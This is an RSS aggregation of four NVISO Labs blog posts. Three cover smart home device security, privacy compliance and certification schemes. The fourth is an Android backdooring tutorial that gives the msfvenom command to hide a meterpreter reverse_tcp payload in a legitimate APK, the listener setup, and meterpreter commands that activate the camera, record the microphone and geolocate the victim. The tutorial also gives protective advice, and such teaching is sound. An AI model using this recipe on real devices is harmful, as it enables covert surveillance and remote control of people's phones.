RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdayNVISO Labs

Smart Home Devices: assets or liabilities? – Part 3: Looking at the future

29 March 2021 at 12:54

This blog post is the last part of a series, if you are interested in the security or privacy of smart home devices, be sure to check out the other parts as well!

TL;DR: In our previous blog posts we concluded that there is quite a long way to go for both security and privacy of smart home environments. In this one, we will take a look at what the future might bring for these devices.

Introduction

After taking a close look at a series of smart home devices and assessing how well they held up to the expectations of the buyer when it comes to security and privacy, we will propose a few solutions to help the industry move forward and the consumer to make the right decision when buying a new device.

A recap

To freshen up your memory, we’ll quickly go over the key takeaways of our previous blog posts. If you haven’t read them yet, feel free to check out the parts about security and privacy of smart home environments as well!

Security

When it came to security, many of the devices we tested swung one of two ways: either security had played a major role in the manufacturing process and the device performed well across the board, or the manufacturer didn’t give a hoot about security and the device was lacking any kind of security measures altogether. This means that buying one of these devices is a pretty big hit or miss, especially for the less tech-savvy consumer.

To overcome this issue, consumer guidance is needed in some form or another to steer the buyer towards the devices that offer at least a baseline of security measures a consumer could reasonably expect of a device that they will eventually install into their household.

Privacy

Many devices often didn’t perform much better when looking at privacy. Just like with security, there is a massive gap in maturity between manufacturers that put in an effort to be GDPR compliant and those that didn’t. Luckily the industry has undergone a major shift in mentality which means that most companies at least showed a lot more goodwill towards the people whose data they are collecting. Nevertheless, the need for stronger enforcement and more transparency around fines and sanctions became very clear from my results.

How can we regulate?

Regulating the market can be done in many ways, but for this blog post, we’ll be taking a look at two of them that have historically also been used for other products: in the form of binding standards and certifications, or as voluntary quality labels. Each of these has their own advantages and disadvantages.

Standardisation & Certification

The security industry is rife with standards: there is ISO/IEC 27001 to ensure organisations and their services adhere to the proper security practices; for secure development, there are standards such as the OWASP SAMM and DSOMM; when it comes to security assessments of specific services or devices, standards such as OWASP’s ASVS and MASVS come to mind. For IoT devices, this is no different: OWASP’s ISVS (IoT Security Verification Standard) offers a standardised, controlled methodology to test the security of IoT devices. And these are just the tip of the iceberg: there are a massive number of resources that can be used, as is reflected in this graph. The fact that so many standards exist, reflects the need for specialised industry-specific guidance: a “one-size-fits-all” solution may not exist.

Standards
Did anyone mention standards?
(Image source: XKCD, used under CC BY-NC 2.5)

Mandatory quality requirements and certification to certain standards is nothing new if we take a look at other markets. Take the food industry for example, where rigorous requirements ensure that the meals we put on our table at the end of the day won’t make us sick. But even when we look closer to the smart home devices market, we see that mandatory labels already exist in some form: the CE label is a safety standard that ensures the consumer goods we purchase in the store won’t malfunction and injure us, or the FCC label, that ensures they won’t cause any interference with other radio-controlled devices in the area. Whereas these safety-focused labels and standards are all commonplace and seen as a given, the concept of a binding cyber security baseline for such smart devices is a relatively new one and is not nearly as easily implemented.

The EU’s Cybersecurity Act (CSA) that was introduced in April 2019 gives the European Union Agency for Cybersecurity (ENISA) a new mandate to build out exactly such certification schemes. In response to this, they have published their first certification scheme candidate, the so-called EUCC, in July 2020. Even closer to home, here in Belgium the legal groundwork is also being laid for a Belgian National Cybersecurity Certification Authority, including provisions to accommodate the EU Common Criteria, Cloud Security and 5G certification schemes.

Taking a look overseas, the USA’s “Internet of Things Cybersecurity Improvement Act of 2020” shows us that the need for a stricter regulation of IoT devices not only occurs here in Europe. This newly passed law is based on NIST’s Internal Report 8259 “Foundational Cybersecurity Activities for IoT Device Manufacturers“, and you guessed it – it calls for the creation of IoT security standards and guidelines that the US government will adhere to, in the hope that industry will follow suit.

Quality Labels

On top of the baseline, some consumers may be looking for additional safeguards and guarantees that the device they are buying is up to snuff. Especially when purchasing devices that handle more sensitive types of data, such as smart home assistants, cameras, or locks, security plays a larger role for many buyers. In this case, a voluntary quality label could form a good indicator for consumers that the manufacturer went the extra mile, and it would prove a good point to compete on for the manufacturers themselves to distinguish their product from the competitor’s offerings. Just like the certification of the baseline requirements for devices, an IoT quality label is also proposed in the aforementioned EUCC cybersecurity scheme candidate. Quality labels can be used to either reflect that a device adheres to a certain standard of cyber security or privacy, or that they have implemented additional measures beyond the baseline that are not necessarily found in other devices of the same category. In the case of the EUCC, the label will show a consumer that it is certified against that particular certification scheme, as well as list a CSA assurance level (Basic, Substantial, or High) to reflect the degree of how advanced the security measures of the device are.

Proposed Label by the EUCC
(Image source: EUCC Candidate Scheme, ENISA)

The EUCC is not the first certification scheme that mentions a quality label. In the context of industrial control systems, the IEC 62443-4-1 and 62443-4-2 standards – which formulate guidelines for the production lifecycle and technical guidelines for the security of products – also provide a certification scheme and label, but adoption within the industry has been very slow.

While a widely adopted quality label is not available yet, in the meantime manufacturers can still distinguish themselves by being transparent about the security of their products: how about a page on the website that outlines the efforts spent on security?

Conclusion

To guide the smart home industry towards a better, more solid security baseline and stronger privacy guarantees, binding regulations for all devices sold within the EU can pave the way. These regulations should be based on the mandated use of secure building blocks and easy to verify guidelines. The recent cybersecurity act gives ENISA a new mandate to create exactly such certification schemes, a first of which they have released in July 2020 in the form of the EUCC.

Additionally, a voluntary IoT quality label can be a strong indicator for consumers who want more than just a baseline of security measures and a competition point for manufacturers who want to prove they went the extra mile.

This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Backdooring Android Apps for Dummies

31 August 2020 at 07:57

TL;DR – In this post, we’ll explore some mobile malware: how to create them, what they can do, and how to avoid them. Are you interested in learning more about how to protect your phone from shady figures? Then this blog post is for you.

Introduction

We all know the classic ideas about security on the desktop: install an antivirus, don’t click suspicious links, don’t go to shady websites. Those that take it even further might place a sticker over the webcam of their laptop, because that is the responsible thing to do, right?

But why do most people not apply this logic when it comes to their smartphones? If you think about it, a mobile phone is the ideal target for hackers to gain access to. After all, they often come with not one, but two cameras, a microphone, a GPS antenna, speakers, and they contain a boatload of useful information about us, our friends and the messages we send them. Oh, and of course we take our phone with us, everywhere we go.

In other words, gaining remote access to someone’s mobile device enables an attacker to do all kinds of unsavoury things. In this blog post I’ll explore just how easy it can be to generate a rudimentary Android remote administration trojan (or RAT, for short).

  • Do you simply want to know how to avoid these types of attacks? Then I suggest you skip ahead to the section “How to protect yourself” further down the blog post.
  • Do you want to learn the ins and outs of mobile malware making? Then the following section will guide you through the basics, step by step.

It’s important to know this metasploit RAT is a very well-known malware strain that is immediately detected by practically any AV solution. This tutorial speaks of a rudimentary RAT because it lacks a lot of functionality you would find in actual malware in the wild, such as obfuscation to remain undetected, or persistence to gain access to the device even when the app is closed. Because we are simply researching the possibilities of these types of malware and are not looking to attack a real target, this method will do just fine for this tutorial.

Cooking yourself some mobile malware; a recipe

Ingredients

  • A recent Kali VM with the latest Metasploit Framework installed
  • A spare Android device
  • [Optional] A copy of a legitimate Android app (.apk)

Instructions

Step 1 – Find out your IP address

To generate the payload, we will need to find out some more information about our own system. The first piece of information we’ll get is our system’s IP address. For the purpose of this blog post we’ll use our local IP address but in the real world you’d likely use your external IP address in order to allow infected devices to connect back to you.

Our IP address can simply be found by opening a terminal window, and typing the following command:

ip a

The address I will use is the one from the eth0 network adapter, more specifically the local IPv4 address as circled in the screenshot.

Step 2 – Generate the payload

This is where the real work happens: we’ll generate our payload using msfvenom, a payload generator included in the Metasploit Framework.

Before you start, make sure you have the following ready:

  1. Your IP address as found in the previous step
  2. Any unused port to run the exploit handler on
  3. (Optional) A legitimate app to hide the backdoor in

We have two options: either we generate the payload standalone, or we hide it as part of an existing legitimate app. While the former is easier, we will go a step further and use an old version of a well-known travel application to disguise our malware.

To do this, open a new terminal window and navigate to the folder containing the legitimate copy of the app you want to backdoor, then run the following command:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<your_ip_address> LPORT=<your unused port> -x <legitimate app> -k -o <output name>

For this blog post, I used the following values:

  • <your ip address> = 192.168.43.6
  • <your unused port> = 4444
  • <legitimate app> = tripadvisor.apk
  • <output name> = ta-rat.apk

Step 3 – Test the malware

Having our payload is all fine and dandy, but in order to send commands to it, we need to start a listener on our kali VM on the same port we used to create our malware. To do this, run the following commands:

msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <your ip address>
set lport <your unused port>

run

Now that we have our listener set up and ready to accept connections, all that remains for us to do is run the malware on our spare Android phone.

For the purposes of this blogpost, I simply transferred the .apk file to the device’s internal storage and ran it. As you can see in the screenshot, the backdoored application requires quite a lot more permissions than the original does.

The original app permissions (left) and the malicious app permissions (right)

All that’s left now is to run the malicious app, and …

We’re in!

Step 4: Playing around with the meterpreter session

Congratulations! If you successfully reached this step, it means you have a working meterpreter session opened on your terminal window and you have pwned the Android phone. So, let’s take a look at what we can do now, shall we?

Activating the cameras

We can get a glimpse into who our victim is by activating either the front or the rear camera of the device. To do this, type the following command in your meterpreter shell:

webcam_stream -i <index>

Where <index> is the index of the camera you want to use. In my experience, the rear camera was index 1, while the selfie camera was at index 2.

Recording the microphone

Curious about what’s being said in the victim’s vicinity? Try recording the microphone by typing:

record_mic -d <duration>

Where <duration> is the duration you want to record in seconds. For example, to record 15 seconds of audio with the device’s built-in microphone, run:

record_mic -d 15

Geolocation

We can also find out our victim’s exact location by typing:

geolocate

This command will give us the GPS coordinates of the device, which we can simply look up in Google Maps.

Playing an audio file

To finish up, we can play any .wav audio file we have on our system, by typing:

play <filename>.wav

For example:

play astley.wav

Experimenting with other functionality

Of course, these are just a small set of commands the meterpreter session has to offer. For a full list of functionalities, simply type:

help

Or for more information on a specific command, type:

<command> -h

And play around a bit to see what you can do!

Caveats

During my initial attempts to get this to work, there were a few difficulties that you might also run into. The most difficult part in the process is finding an app to add the backdoor to. Most recent android apps prevent you from easily decompiling and repackaging them by employing various obfuscation techniques that make it much more difficult to insert the malicious code. For this exercise, I went with an old version of a well known travel app that did not (yet) implement these techniques, as trying to backdoor any of the more recent versions proved unsuccessful.

This is further strengthened by the fact that Android’s permissions API is constantly evolving to prevent this type of abuse by malicious apps. Therefore, it’s not possible to get this exploit to work on the newest Android versions that require explicit user approval before granting the app any dangerous permissions at runtime. That said though, if you are an Android phone user reading this post, be aware that new malware variants constantly see the light of the day, and you should always think twice before granting any application a permission on your phone it does not strictly require. Yes, even if you have the latest safety updates on your device. Even though the methods described in this blog post only work for less recent versions of Android, considering that these versions represent the majority of the Android market share, an enormous number of devices remain vulnerable to this exploit to this day.

There exist some third-party tools and scripts on the internet that promise to achieve more reliable results in backdooring even more recent android apps. However, in my personal experience these tools did not always live up to their expectations. Your mileage may vary in trying these out, but in any case, don’t blindly trust the ReadMe of code you find on the internet: check it yourself and make sure you understand what it does before you run it.

How to protect yourself

Simply put, protecting yourself against these types of attacks starts with realising how these threats make their way onto your system. Your phone already takes a lot of security precautions against malicious applications, so its a good start to always make sure your phone is running the latest update. Additionally, you will need to think twice: once when you choose to install the application, and one more time when you choose to grant the application certain permissions.

First, only install apps from the official app store. Seriously. The app stores for both Android and iOS are strictly curated and scanned for viruses. Is it impossible that a malicious app sneaks by their controls? Not entirely, but it is highly unlikely that it will stay in the store for long until it’s noticed and removed. On iOS, you don’t have much of a choice anyway: if you have not jailbroken your device, you are already restricted to the App Store. For Android, there’s a setting that also allows you to install apps from untrusted sources. If you simply want to enjoy the classic experience your smartphone offers you, you won’t need to touch that setting at all: the google play store likely has everything you’d ever want to do. If you are a more advanced user who wants to be able to fully customise their phone and even root it or add custom ROMs: be my guest, but be extra careful when installing anything on your phone, as you lose a large amount of protections the google play store offers you. Experimenting with your phone is fine, but you need to be very aware of the additional risks you are taking. That goes double if you are downloading unofficial apps from third party sources.

Second, not all apps need all the permissions they ask for. A flashlight application does not need access to your microphone to function properly, so why would you grant it that permission? If you are installing an application and the permission list seems suspiciously long, or certain items definitely are not needed for that app to function, maybe reconsider installing it in the first place, and definitely do NOT give it those permissions. In the best case, they are invading your privacy by tracking you for advertising. In the worst case, a criminal might be trying to exploit the permissions to spy on you.

One last tip I’d like to give is to leave the security settings on your device enabled. It doesn’t matter if you have an iPhone or an Android phone: both iOS and Android have some great security options built in. This also means you won’t need third party antivirus apps on your phone. Often, these apps provide little extra functionality as they are much more restricted in what they can do as compared to what the native security features of your mobile phone OS are already doing.

Conclusion

If there is anything I’d like you to remember from reading this blog post, it’s the following two points:

1. Creating Mobile Malware is Easy. Almost too easy.

This blog post went over the steps to take in order to make a rudimentary Android malware, demonstrating how easy it can be to compromise a smartphone. With a limited set of tools, we can generate and hide a meterpreter reverse shell payload into an existing app, repackage it and install it on an Android device. Anyone with enough motivation to do this can learn it in a limited time frame. There is no need for a large amount of technical knowledge in order to learn this.

2. Smartphones are computers, they need to be protected.

It might not look like one, but a smartphone is a computer just like the one sitting on your desk. These devices are equally vulnerable to malware, and even though the creators of these devices already take a lot of precautions, the user is in the end responsible to keep their device safe. Smartphone users should be aware of the risks their devices face and stay away from unofficial applications outside of the app store, enable the security settings on their devices and be careful to grant excessive permissions to apps, especially from untrusted sources.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their cyber security strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Smart Home Devices: assets or liabilities? – Part 2: Privacy

30 November 2020 at 09:52

TL;DR – Part two of this trilogy of blog posts will tackle the next big topic when it comes to smart home devices: privacy. Are these devices doubling as the ultimate data collection tool, and are we unwittingly providing the manufacturers with all of our private data? Find out in this blog post!

This blog post is part of a series – you can read part 1 here, and keep an eye out for the next part too!

Security: ✓ – Privacy: ?

In my previous blog post, I gave some insights into the security level provided by a few Smart Home environments that are currently sold on the European market. In conclusion, I found that the security of these devices is often a hit or miss and the lack of transparency around security means it can be quite difficult for the consumer to choose the good devices as opposed to some of the bad apples. There is one major topic missing from it though: even if a device is secure, how well does it protect the user’s privacy?

Privacy concerns

It turns out that this question is not unjustified: just like the security concerns surrounding smart home devices, privacy concerns are at least equally present, or maybe even more so. The fear that our own house is spying on us, is something that should be prevented by transparency and strong data subject rights.

These data subject access rights might have already been there on paper for a long time, but it’s never been easy to enforce them in practice. I strongly recommend looking at this paper by Jef Ausloos and Pierre Dewitte that shows just how difficult it used to be to get a data controller to comply with existing regulation.

Does this mean that there is no hope? Well, not exactly. Since then, the GDPR has come into effect. Even though it might still be too early to get concrete results, there have been some developments moving into the right direction. Just a few months ago, in July 2020, the EU-US privacy shield was deemed invalid after a ruling by the Court of Justice of the EU in a case brought up by Max Schrems’ NGO ‘noyb’ (‘none of your business’). This decision means that data transfers from the EU to the US are subject to the same requirements as transfers to any other country outside of the EU.

Existing regulation in Europe

So, which laws are there that protect our privacy anyways? To start with the basics, the European Convention of Human Rights and the Charter of Fundamental Rights of the European Union lay the groundwork for every individual’s right to privacy in their Article 8 and Article 7 respectively. These articles state that: “Everyone has the right to respect for his private and family life, his home and his correspondence.”.

On top of these, there used to be Directive 95/46/EC, which outlined the requirements each EU member state had to implement into their national privacy regulation. However, each member state could implement these requirements at their own discretion, which led to a lot of diverging laws between EU member states. The directive was eventually revoked for GDPR to take its place.

The General Data Protection Regulation (GDPR) is the current regulation that harmonises the privacy regulation for all EU member states. Its well-known new provisions enable data subjects to more effectively enforce their rights and protects the privacy of all people within the EU; or at least it does so on paper.

From paper to practice

Aside from testing the security of each device, I decided to also include some privacy tests in the scope of my assessments. For more information on the choice of devices, make sure to check out my previous blog post!

For each device, I added privacy-related tests in two major fields:

  • privacy policies: I verified if, for each device, the privacy policy contained all the relevant information it should have according to GDPR;
  • data subject access rights: I contacted each vendor’s privacy department with a generic data subject access request, asking them to give me a copy of the personal data they held about me.

Privacy policies: all or nothing

The first step in checking the completeness of a privacy policy, is finding out where it is stored – if it even exists. In many cases, finding a privacy policy was easy, but finding the right one was a different story. Many vendors had multiple versions of the policy, sometimes different editions for the USA and the EU, and other times they simply excluded everything from their scope except the website – not very useful for this research.

The privacy policies showed the exact same phenomenon as I already saw in the security part of the research: if they were compliant on one part, usually they put in a good attempt to be compliant across the board. The opposite was also true: if a policy was incomplete, it often didn’t contain any of the required info as per the GDPR. The specific elements that need to be included in a privacy policy under GDPR are outlined in Article 13. The table below shows which of the policies adhered to which provisions in this article.

The results of checking each privacy policy
(Image credit: see “Reference” below)

Access requests: hide & seek

In the exact same way that it can be difficult to locate a privacy policy, it can sometimes be a real hassle to find the correct contact details to submit a data access request. Most vendors with a compliant privacy policy had either an email address of the DPO, or a link to an online form listed as a means of contact. In case I could not locate the correct contact details, I would attempt to reach them a single time by mailing to their general information address or contacting their customer support. I would also send out a single reminder to each vendor if they had not replied after one month.

What it feels like trying to reach the DPO of many manufacturers
(Image credit: imgflip.com)

Surprisingly, many vendors straight up ignored the request: one third (!) of requests went unanswered. Those that did reply, usually responded quite quickly after receiving the initial request. With a few exceptions that requested deadline extensions or simply claimed to “have never received the initial email” after being sent a reminder.

One third of the sent requests went unanswered
(Image credit: see “Reference” below)

Most importantly, the number of satisfactory replies after running this experiment for over 5 months was disappointingly low. Often, either the answers to the questions in the request or the returned data itself were strongly lacking. In some cases, no satisfying answer was given at all. In one or two notable instances, however, the follow up of the privacy department was excellent and an active effort was made to comply with the request as well as possible.

The aftermath

From these results, it’s clear that there are some changes to be seen in the privacy landscape. Here and there, companies are putting in an effort to be GDPR compliant, with varying effectiveness. However, just like with security, there is a major gap in maturity between the different vendors: the divide between those that attempt to be compliant and those that are non-compliant is massive. Most notably, the companies that ignored access requests or had outdated privacy policies were those that might deem themselves too small to be “noticed” by authorities or are simply located too far from the EU to care about it. This suggests there is a need for more active enforcement, also on companies incorporated outside of the EU, and more transparency surrounding fines and penalties imposed on those that are non-compliant.

Even though privacy compliance is going in the right direction, there is still a lot of progress to be made in order to get an acceptable baseline of compliance across the industry. Active enforcement and increased transparency surrounding fines and penalties is needed to motivate organisations to invest in their privacy and data protection maturity.

Stay tuned for Part 3 of this series, in which I’ll be discussing some options for dealing with the issues I found during this research.


This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

Smart Home Devices: assets or liabilities? – Part 1: Security

14 September 2020 at 11:12

This blog post is part of a series, keep an eye out for the following parts!

TL;DR – Smart home devices are everywhere, so I tested the base security measures implemented on fifteen devices on the European market. In this blog post, I share my experience throughout these assessments and my conclusions on the overall state of security of this fairly new industry. Spoiler alert: there’s a long road ahead of this industry to grow in maturity when it comes to security.

Great new toys, great new responsibilities

Increasingly often, we are surrounding ourselves with connected devices. Even those who are adamant about not having any “smart devices” in their homes usually happily switch on their smart TV at the end of a long day while they drop down on the sofa. According to market studies and economic forecasts, the market share of smart home devices has been steadily rising for quite some time now, and that is not expected to be changing anytime soon. Smart home environments are everywhere these days, and for the most part they make our lives a lot more convenient.

However, there is another side to the coin: just like the devices themselves, news coverage about security concerns surrounding these devices has been popping up weekly, if not daily. Crafty criminals are tricking smart voice assistants into opening garage doors, circumventing ‘smart’ alarms or might even be spying on people through their internet-connected camera. We’ve already taken a deep dive in the past into some smart alarms, which showed their security left a lot to be desired. This raises the question: how secure are these devices we introduce to our daily lives really? I’ve tried to find out exactly that.

File:HAL9000 I'm Sorry Dave Motivational Poster.jpg - Wikimedia Commons
The words none of us want to hear when we ask our smart assistant to unlock the front door.
(Image credit: Wikimedia Foundation)

Research methodology

To get an idea of the overall security of Smart Home devices on the European market, I selected fifteen devices, chosen in such a way that they represented as many different product categories, price ranges and brands as possible. Where possible, I made sure to get at least two devices of different price ranges and brands in each category to be able to compare them.

Devices of all kinds were chosen for the tests.
(Image credit: see “Reference” below)

Then, I subjected each device to a broad security assessment. Each assessment consisted of a series of tests that were based on ENISA’s “Baseline Security Recommendations for IoT”. Here, the goal was not to conduct a full in-depth assessment of each device, but to get an overview on whether each device implemented the baseline of security measures a customer could reasonably expect from an off-the-shelf smart home solution. In order to guarantee repeatability of the tests, I mostly relied on automated industry-standard testing tools, such as nmap, Wireshark, Burp Suite, and Nessus.

In my tests, I covered the following range of categories: Network Communications, Web Interfaces, Operating Systems & Services, and Mobile Applications.

Network Communications

Because (wireless) network communications make up a large part of the attack surface of Smart Home devices, I performed a network capture of the traffic of each device for an idle period of 24 hours.

Without even looking into the data itself, it’s already interesting to note the vast differences in the number of captured packets within this period, where smart voice assistants and cameras are the clear winners.

Why does a doorbell send that many packets?
(Image credit: see “Reference” below)

In the figure below, you can see the different protocols that these devices used.

Oh, and all of the devices used DNS of course!
(Image credit: see “Reference” below)

When we think about network security, the encryption of the data is the most obvious security control we can check. However, this proved to be not always easy: Wireshark will tell you if TLS is being used or not, but aside from that, how can we determine if a raw TCP or UDP data stream is encrypted or not? For this, I used two scripts written by my colleague, Didier Stevens: simple_tcp_stats and simple_udp_stats.

These scripts calculate the average Shannon Entropy in each data stream. Streams with a high entropy value are likely encrypted, whereas streams with a low entropy value will likely contain natural text or structured data. The results were surprising: when mapping the different entropy scores in some box plots, many devices had multiple data streams with low entropy values, indicating that data was likely not being encrypted.

  • Lower score means data is less likely to be encrypted.
  • Keep in mind (unencrypted) DNS was included in these graphs.
Anybody order some entropy boxplots?
(Image credit: see “Reference” below)

The above results indicate that while yes, some devices used state of the art, standardised, and most importantly secure network protocols, about half of them used something that was either not recognised by Wireshark (e.g. raw TLS/UDP streams) or has been proven to be insecure in the past (e.g. TLS 1.0). The results of the entropy testing are striking: not a single device wasn’t guilty of sending some data that was likely not encrypted: even those devices that encrypted the majority of their communications still sent DNS or sometimes NTP requests unencrypted over the network.

Web Interfaces

A lot of devices need some type of interface to interact with them. In most cases, that’s the mobile application accompanying the device. Sometimes, devices also support interactions via a web interface. Then, there are two options: a local interface, directly running on the device, or a cloud interface that runs on online servers maintained by the manufacturer. In the case of the latter, which made up most of the devices, doing in-depth testing was simply not possible due to legal limitations. However, one thing I could do was scan the cloud interface for SSL/TLS vulnerabilities with Qualys SSL Labs. I tested local interfaces by running an active scan in Burp Professional and performing a nikto scan.

On local interfaces, the most common serious flaw I found was the lack of encrypted communications: all of them ran over HTTP and sent credentials (as well as all other information, such as configuration data) in plaintext over the network. Quite a serious violation of secure web development practices for a really long time now.

Cloud interfaces were accessible via HTTPS, and all of them scored a B on the SSL Labs test because they all supported old TLS versions 1.0 and/or 1.1. While a B is not an inherently bad score, this indicates many vendors prioritise compatibility over security, as a higher score would be expected of those that want to deliver the best security to their customers.

All in all, it seems like developers adhered to the regular best practices when it came to cloud portals, but somehow forgot that local web interfaces also need the same care and protection as any other exposed service would have. It’s not because a device isn’t directly open for connections over the internet, that an attacker who gained access to the local network won’t try to gain a larger foothold by connecting to the devices within it.

Operating System & Services

I port scanned each device with nmap and ran some basic service discovery and vulnerability scans with Nessus Essentials. Sadly, I found that traditional scanning methods translate very poorly to these smart home devices: service discovery was very unreliable at best and plain wrong in most cases. Vulnerability scanning rarely yielded any interesting results besides some basic informational alerts. This is likely caused by the large amount of proprietary technologies or custom protocols that are being used by these devices.

What this concretely means is that there’s no straightforward, easy way to get an insight in the security of the devices. Gaining such knowledge would require tailored, targeted security assessments: a time consuming and difficult task, even for highly skilled professionals. Pretty discomforting, if you ask me.

Mobile Applications

As I mentioned earlier, users can often interact with their devices via web interfaces or a smartphone app. I performed static analysis on each of the corresponding android apps with MobSF (Mobile Security Framework). More specifically, I looked at:

  • the permissions requested by each app;
  • the known trackers embedded in the code;
  • domains that could be found in the code to get an indication of which and how many servers the app was calling out to.

I found that a lot of applications were asking for a disproportionally large number of permissions, sometimes even permissions an application arguably would not need to function properly. For example, what use does a smart light bulb app have for requesting permissions to record audio?

‘Dangerous’ permissions are any permissions the user needs to explicitly allow access for.
(Image credit: see “Reference” below)

I also noticed a significant number of mobile apps that included trackers. Most of them seemed to be for bug fixing and crash reporting, but others also included more intrusive tracking for advertising purposes.

Google Firebase Analytics and CrashLytics are likely included for crash reporting.
(Image credit: see “Reference” below)

The Verdict

So, based on all this information, what can we say about the security of the smart home devices currently available on the market? Well, for starters, in all the paragraphs above we can see there’s some good things, often followed by a ‘but’. Based on the fact that when we look at the bigger picture, devices that were properly secured on one front usually also seemed to do well in all the others, it seems to be quite a hit or miss when it comes to security. Vice versa, devices that were lacking certain security controls were usually insecure across the board. Most notably, in my results I clearly saw what security professionals already knew: security is a complete package. You simply can’t just cover one part and leave the other aspects of your product exposed. For products that came from manufacturers that understood this, I saw known to be secure network protocols, strong authentication options and user friendliness that made sure security was taken care of by default with little effort required from the consumer. The other products often had security as a mere afterthought: something that could be enabled if the user dug deep into the app menus, or maybe even not at all.

What can we do?

Now that we know it’s a hit or miss with these smart home devices, how can we make the right decisions in the store and make sure we don’t end up with one of the bad apples? Is it just a matter of luck, or can we steer the odds in our favour?

Luckily, there are a few things you can look out for; price is one of them, but – as we have already shown in these previous blog posts here and here  – should never be your only indicator. I found that brand recognition is an important factor in the level of attention the manufacturer will pay to security of their device. If a brand is well known and needs to uphold their good reputation to stay in business, they will also spend more time on fixing security flaws in the future, even after their product is already out for some time. And that brings me to the next point: automatic updates.

Even if you have a device that is secure today, if it’s never updated in the upcoming years it will eventually become vulnerable. Therefore, another good indication of security is the presence of updates. Ideally, automatic updates that are pushed to the device by the vendor without the need for user interaction, as we are probably all guilty of deferring updates out of convenience until it’s too late.

Afterthoughts and looking ahead

The overall security of devices on the market seems to be a hit or miss. Currently there are not many indicators consumers can look for when buying a device, but the combination of price, brand recognition and the presence of security updates can already give a general guideline on which device will be a good bet. If we want to get a clearer overview of the actual security of smart home IoT devices, an in-depth manual security assessment is needed because automated tools provide inaccurate or unsatisfying results.

Stay tuned for Part 2 of this series, in which I’ll be talking about smart home devices and privacy!


This research was conducted as part of the author’s thesis dissertation submitted to gain his Master of Science: Computer Science Engineering at KU Leuven and device purchases were funded by NVISO labs. The full paper is available on KU Leuven libraries.

Reference

[1] Bellemans Jonah. June 2020. The state of the market: A comparative study of IoT device security implementations. KU Leuven, Faculteit Ingenieurswetenschappen.

About the Author

Jonah is a consultant in the Cyber Strategy & Culture team at NVISO. He taps into the knowledge of his technical background to help organisations build out their Cyber Security Strategy. He has a strong interest in ICT law and privacy regulation, as well as the ethical aspects of IT. In his personal life, he enjoys video & board games, is a licensed ham radio operator, likes fidgeting around with small DIY projects, and secretly dreams about one day getting his private pilot’s license (PPL).

Find out more about Jonah on his personal website or on Linkedin.

❌